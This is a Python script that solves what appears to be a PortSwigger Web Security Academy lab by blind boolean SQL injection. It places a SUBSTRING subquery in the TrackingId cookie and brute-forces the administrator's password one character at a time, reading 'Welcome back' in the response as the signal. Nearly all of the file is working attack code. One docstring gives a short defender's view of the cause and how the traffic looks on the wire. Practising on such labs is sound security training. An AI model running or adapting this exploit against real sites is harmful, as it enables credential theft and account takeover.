from termcolor import colored
import requests
import sys
import signal
import string
import time
from pwn import log
# Module-level state shared between the SIGINT handler and makeSQLI().
# p1 / p2 hold the two progress loggers once a run has started; until then
# they are None, which is what the handler's truthiness check relies on.
p1 = p2 = None
# Characters recovered so far, appended to one position at a time.
password = ""
def def_handler(sig, frame):
    """Handle Ctrl-C: announce the abort, close the progress logger, exit.

    Args:
        sig: Signal number passed by the signal module (unused).
        frame: Interrupted stack frame (unused).
    """
    farewell = colored("\n\n[! Saliendo...]\n", "red")
    print(farewell)

    # p1 is still None if the interrupt arrives before a run has created
    # the progress logger, so only report the failure when it exists.
    if p1:
        p1.failure("Ataque detenido por el usuario")

    # NOTE(review): the listing lost its indentation; the exit is assumed to
    # be unconditional rather than nested under the check above.
    sys.exit(1)
# Route Ctrl-C (SIGINT) through def_handler so an interrupted run exits
# through the handler instead of with a raw KeyboardInterrupt traceback.
signal.signal(signal.SIGINT, def_handler)

# Candidate alphabet tried at each position: lowercase ASCII letters, then digits.
characters = "".join((string.ascii_lowercase, string.digits))
def makeSQLI():
    """Recover the administrator password from one lab instance, char by char.

    The request carries a boolean condition inside the ``TrackingId`` cookie
    and treats the presence of "Welcome back" in the response body as the
    true/false signal. Up to 20 positions are probed, each against every
    entry of ``characters``; the run stops early at the first position where
    no candidate matches. The result is kept in the module-level ``password``
    and printed at the end.

    The host, tracking id and session cookie are hard-coded values tied to a
    single web-security-academy.net lab instance.

    Defender's view: the behaviour the script relies on presumably comes from
    the application placing the cookie value directly into a SQL statement;
    binding it as a query parameter removes the signal. On the wire the run
    shows up as a burst of GET requests from one client whose ``TrackingId``
    cookie contains quotes, ``SELECT`` and a trailing SQL comment, with only
    one character changing between consecutive requests.
    """
    global p1, p2, password

    target = "https://0ab1007e0498e69a8311dc19001f003d.web-security-academy.net"

    password = ""  # start every run from an empty result
    p1 = log.progress("SQLI")
    p2 = log.progress("Password")

    p1.status("Iniciando ataque de fuerza bruta")
    time.sleep(1)

    for pos in range(1, 21):
        for candidate in characters:
            jar = {
                'TrackingId': f"MvOj8narJjYLAYaQ' AND (SELECT SUBSTRING(password,{pos},1) FROM users WHERE username='administrator')='{candidate}'-- -",
                'session': "VyEdGMgLdTnjYhnXo9xKeH3fVZ5KPNi0"
            }
            p1.status(f"Probando posición {pos}: {candidate}")

            try:
                response = requests.get(target, cookies=jar, timeout=10)
            except requests.RequestException as e:
                # Any transport error ends the whole run.
                p1.failure(f"Error de conexión: {e}")
                sys.exit(1)

            if "Welcome back" in response.text:
                password += candidate
                p2.status(password)
                break  # this position is settled; move to the next one
        else:
            # No candidate matched: treat this position as the end of the
            # value and leave the outer loop without the per-position pause.
            outcome = "Contraseña encontrada (posición vacía)"
            break

        time.sleep(0.5)  # pause between positions
    else:
        # All 20 positions produced a match.
        outcome = "Contraseña completa!"

    p1.success(outcome)
    p2.success(password)
    print(colored(f"\n[+] Contraseña del administrador: {password}", "green"))
# Run only when executed as a script, not when the module is imported.
if "__main__" == __name__:
    makeSQLI()